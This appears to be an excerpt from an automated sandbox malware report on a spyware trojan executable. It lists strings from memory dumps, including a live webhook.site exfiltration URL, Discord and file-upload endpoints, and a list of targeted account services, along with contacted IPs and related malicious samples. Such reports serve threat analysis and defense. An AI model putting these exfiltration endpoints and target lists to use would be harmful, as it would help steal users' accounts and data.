00000001.00000003.262304215.0000017AC7625000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310867870.0000017AC9774000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.311013401.0000017AC75BB000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.262463075.0000017AC7625000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.317030830.0000017AC75E4000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.318212716.0000017AC75EF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.262304215.0000017AC75F8000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.320473673.0000017AC75F0000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.263171502.0000017AC75F3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sellix.io)	4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://twitter.com)z	4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://disney.com)	4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://crl.securetrust.com/STCA.crl	4Vp6Xc8SFr.exe, 00000001.00000003.276648532.0000017ACA03F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://wwwsearch.sf.net/):	4Vp6Xc8SFr.exe, 00000001.00000003.313059247.0000017AC9F1B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.324994037.0000017AC9F22000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.324813601.0000017AC9EFF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.317461335.0000017AC9EFC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0	4Vp6Xc8SFr.exe, 00000001.00000003.307020159.0000017ACA046000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.270118444.0000017ACA03D000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.276157529.0000017ACA0EC000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308722269.0000017ACA047000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.276648532.0000017ACA03F000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269475039.0000017ACA08D000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269301699.0000017ACA08A000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.275933215.0000017ACA0BF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.268919432.0000017ACA086000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269509616.0000017ACA0A1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://tools.ietf.org/html/rfc6125#section-6.4.3	4Vp6Xc8SFr.exe, 00000001.00000002.324535554.0000017AC9DF0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://tiktok.com)z	4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://crl.xrampsecurity.com/XGCA.crl0	4Vp6Xc8SFr.exe, 00000001.00000003.275933215.0000017ACA143000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269069124.0000017ACA047000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.276669475.0000017ACA143000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.discordapp.com/attachments/963114349877162004/992245751247806515/unknown.png	4Vp6Xc8SFr.exe, 00000001.00000003.317461335.0000017AC9EFC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://origin.com)z	4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://telegram.com)z	4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://riotgames.com)z	4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.cert.fnmt.es/dpcs/	4Vp6Xc8SFr.exe, 00000001.00000003.268784547.0000017ACA0D3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.276157529.0000017ACA0EC000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269101774.0000017ACA0D3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269343833.0000017ACA0AC000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269509616.0000017ACA0D3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269301699.0000017ACA08A000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269509616.0000017ACA0B1000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.270057723.0000017ACA0C0000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269945464.0000017ACA0D3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.275933215.0000017ACA0BF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.268919432.0000017ACA086000.00000004.00000020.00020000.00000000.sdmp	false		high
https://playstation.com)z	4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://pornhub.com)z	4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.accv.es00	4Vp6Xc8SFr.exe, 00000001.00000003.307020159.0000017ACA046000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308722269.0000017ACA047000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.276648532.0000017ACA03F000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269475039.0000017ACA08D000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269301699.0000017ACA08A000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.268919432.0000017ACA086000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269509616.0000017ACA0A1000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	4Vp6Xc8SFr.exe, 00000001.00000003.263171502.0000017AC75F3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wwww.certigna.fr/autorites/u	4Vp6Xc8SFr.exe, 00000001.00000003.276315620.0000017ACA0BF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.276376619.0000017ACA0D0000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.275933215.0000017ACA0BF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm	4Vp6Xc8SFr.exe, 00000001.00000003.264819253.0000017AC97E0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.rfc-editor.org/info/rfc7253	4Vp6Xc8SFr.exe, 00000001.00000003.313483225.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316155835.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316371263.0000017AC9FDB000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.326611429.0000017AC9FDC000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308139438.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://twitch.com)	4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf	4Vp6Xc8SFr.exe, 00000001.00000003.315732154.0000017AC9B8B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.314533021.0000017AC9B88000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.313746956.0000017AC9F82000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.312257969.0000017AC9B41000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310364004.0000017AC9B41000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316155835.0000017AC9F94000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310101800.0000017AC9F7B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.315855580.0000017AC9B95000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316400323.0000017AC9FA9000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.313483225.0000017AC9F7F000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308139438.0000017AC9F70000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	4Vp6Xc8SFr.exe, 00000001.00000003.317682278.0000017AC9B41000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.324796978.0000017AC9EF0000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.312257969.0000017AC9B41000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310364004.0000017AC9B41000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steam.com)z	4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://google.com/	4Vp6Xc8SFr.exe, 00000001.00000003.317461335.0000017AC9EFC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://mahler:8092/site-updates.py	4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.313292014.0000017AC97E6000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.311725138.0000017AC979F000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.313220480.0000017AC97A0000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.265237287.0000017AC9A19000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.265290403.0000017AC97E0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://schemas.mi	4Vp6Xc8SFr.exe	false	URL Reputation: safe	unknown
https://webhook.site/6ef9c344-b801-4707-b071-bfe96f5a7949Fc	4Vp6Xc8SFr.exe, 00000001.00000003.309839320.0000017AC974D000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.319732228.0000017AC9792000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310867870.0000017AC9774000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.317656575.0000017AC9791000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.318423600.0000017AC9792000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.securetrust.com/SGCA.crl	4Vp6Xc8SFr.exe, 00000001.00000003.276648532.0000017ACA03F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://.../back.jpeg	4Vp6Xc8SFr.exe, 00000001.00000002.324535554.0000017AC9DF0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://tools.ietf.org/html/rfc5869	4Vp6Xc8SFr.exe, 00000001.00000003.313746956.0000017AC9F82000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316155835.0000017AC9F94000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310101800.0000017AC9F7B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316400323.0000017AC9FA9000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316573052.0000017AC9FAA000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.313483225.0000017AC9F7F000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308139438.0000017AC9F70000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.python.org/download/releases/2.3/mro/.	4Vp6Xc8SFr.exe, 00000001.00000003.263366632.0000017AC96F7000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.263484937.0000017AC9708000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.320632899.0000017AC8EE0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://blog.cryptographyusering.com/2012/05/how-to-choose-authenticated-encryption.html	4Vp6Xc8SFr.exe, 00000001.00000003.315732154.0000017AC9B8B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.314533021.0000017AC9B88000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.313483225.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.326576109.0000017AC9FC9000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.313746956.0000017AC9F82000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.326611429.0000017AC9FCC000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.312257969.0000017AC9B41000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316155835.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310364004.0000017AC9B41000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316155835.0000017AC9F94000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.317531193.0000017AC9FCB000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310101800.0000017AC9F7B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.315855580.0000017AC9B95000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316371263.0000017AC9FDB000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316400323.0000017AC9FA9000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316573052.0000017AC9FAA000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.324813601.0000017AC9EFF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316400323.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.313483225.0000017AC9F7F000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308139438.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.317461335.0000017AC9EFC000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#https-proxy-error-http-proxy	4Vp6Xc8SFr.exe, 00000001.00000002.324535554.0000017AC9DF0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://httpbin.org/post	4Vp6Xc8SFr.exe, 00000001.00000003.312093466.0000017AC974D000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.309839320.0000017AC974D000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.321220717.0000017AC9759000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.xrampsecurity.com/XGCA.crl2y	4Vp6Xc8SFr.exe, 00000001.00000003.276648532.0000017ACA03F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discordapp.com/api/v6/users/	4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.securetrust.com/STCA.crlB	4Vp6Xc8SFr.exe, 00000001.00000003.276648532.0000017ACA03F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Ousret/charset_normalizer	4Vp6Xc8SFr.exe, 00000001.00000003.314917714.0000017AC9BE1000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.315569281.0000017AC9BE4000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310364004.0000017AC9BC8000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.312257969.0000017AC9BC8000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.311130928.0000017AC9BC8000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308418666.0000017AC9BC8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/urllib3/urllib3/issues/497	4Vp6Xc8SFr.exe, 00000001.00000002.322185873.0000017AC9BF0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.firmaprofesional.com/cps0	4Vp6Xc8SFr.exe, 00000001.00000003.316788721.0000017AC9F86000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.313746956.0000017AC9F82000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.276648532.0000017ACA03F000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310101800.0000017AC9F7B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269069124.0000017ACA047000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.326187933.0000017AC9F8A000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.313483225.0000017AC9F7F000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308139438.0000017AC9F70000.00000004.00000020.00020000.00000000.sdmp	false		high
https://yahoo.com)	4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://netflix.com)	4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://gmail.com)	4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://origin.com)	4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://crl.securetrust.com/STCA.crl0	4Vp6Xc8SFr.exe, 00000001.00000003.276630575.0000017ACA074000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.276560722.0000017ACA055000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://roblox.com)	4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://outlook.com)	4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://yahoo.com/	4Vp6Xc8SFr.exe, 00000001.00000002.324813601.0000017AC9EFF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.317461335.0000017AC9EFC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.ipify.org	4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://hotmail.com)	4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
46.4.105.116	webhook.site	Germany	24940	HETZNER-ASDE	false
64.185.227.155	api4.ipify.org	United States	18450	WEBNXUS	false
159.89.102.253	geolocation-db.com	United States	14061	DIGITALOCEAN-ASNUS	false
173.231.16.75	unknown	United States	18450	WEBNXUS	false
51.38.43.18	api.gofile.io	France	16276	OVHFR	false

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	840711
Start date and time:	2023-04-04 09:03:06 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	4Vp6Xc8SFr.exe
Original Sample Name:	b91a84a6995cb793ef6417222281295b.exe
Detection:	MAL
Classification:	mal72.troj.spyw.winEXE@3/103@14/5
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 46.9% (good quality ratio 41.8%) Quality average: 66.2% Quality standard deviation: 32.9%
HCA Information:	Successful, ratio: 65% Number of executed functions: 73 Number of non-executed functions: 159
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
46.4.105.116	Confidential Letters(Names).xls	Get hash	malicious	Unknown	Browse
64.185.227.155	CnsRlvK7Ho.exe	Get hash	malicious	Targeted Ransomware	Browse	api.ipify.org/
	aKiefGOIEn.exe	Get hash	malicious	Targeted Ransomware, TrojanRansom	Browse	api.ipify.org/
	M74aRxVX4H.exe	Get hash	malicious	Targeted Ransomware, TrojanRansom	Browse	api.ipify.org/
	WolcGwXQ5c.exe	Get hash	malicious	Ficker Stealer, RHADAMANTHYS, Rusty Stealer	Browse	api.ipify.org/?format=wef
	XZerken3Py.exe	Get hash	malicious	Targeted Ransomware, TrojanRansom	Browse	api.ipify.org/
	xc17rfFdOM.exe	Get hash	malicious	Ficker Stealer, Rusty Stealer	Browse	api.ipify.org/?format=wef
	8Ghi4RAfH5.exe	Get hash	malicious	Ficker Stealer, Rusty Stealer	Browse	api.ipify.org/?format=wef
	fb623f4ae4dcaa007cac4365aa3ce13526ae32b94f2d9.exe	Get hash	malicious	Ficker Stealer, Rusty Stealer	Browse	api.ipify.org/?format=wef
	file.exe	Get hash	malicious	Ficker Stealer, Rusty Stealer	Browse	api.ipify.org/?format=wef
	48PTRR4pVY.exe	Get hash	malicious	Ficker Stealer, Rusty Stealer	Browse	api.ipify.org/?format=qwd

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api4.ipify.org	Product_Specification.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	173.231.16.75
	IMG_62100_41600pdf.exe	Get hash	malicious	AgentTesla	Browse	173.231.16.75
	ORD_751210_xls.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.237.62.211
	DOCS .HTML	Get hash	malicious	Unknown	Browse	104.237.62.211
	dfdsMNGdwy.exe	Get hash	malicious	AgentTesla	Browse	173.231.16.75
	RFQ_NO_012594.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	104.237.62.211
	rNewPOSPL036570_pdf.exe	Get hash	malicious	AgentTesla	Browse	64.185.227.155
	HSBC_payment_receipt_confirmation.exe	Get hash	malicious	AgentTesla, AveMaria, zgRAT	Browse	64.185.227.155
	CT12#_TC-WI-60.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	173.231.16.75
	DHL_AWB_NO_#AWB_4507558646.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	64.185.227.155
	Request_For_Quotation.exe	Get hash	malicious	AgentTesla	Browse	173.231.16.75
	j3F23QoLs3.exe	Get hash	malicious	AgentTesla	Browse	64.185.227.155
	LOS_No_140491194.exe	Get hash	malicious	AgentTesla	Browse	104.237.62.211
	bgsZRgkOtW.exe	Get hash	malicious	AgentTesla	Browse	104.237.62.211
	IhJrdQePlw.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	173.231.16.76
	kf17iplRSU.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	64.185.227.155
	Kh4p0pc338.exe	Get hash	malicious	AgentTesla	Browse	173.231.16.76
	YkaLDEBgaR.exe	Get hash	malicious	AgentTesla	Browse	64.185.227.155
	915YHnUOC7.exe	Get hash	malicious	AgentTesla	Browse	173.231.16.76
	TT_Copy.exe	Get hash	malicious	AgentTesla	Browse	173.231.16.76

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HETZNER-ASDE	Cerere_de_ofert#U0103_(Universitatea_din_Oradea)_Eui894_-_CRO633.exe	Get hash	malicious	Remcos	Browse	144.76.136.153
	W3XuVXuNsq.exe	Get hash	malicious	RedLine	Browse	138.201.195.134
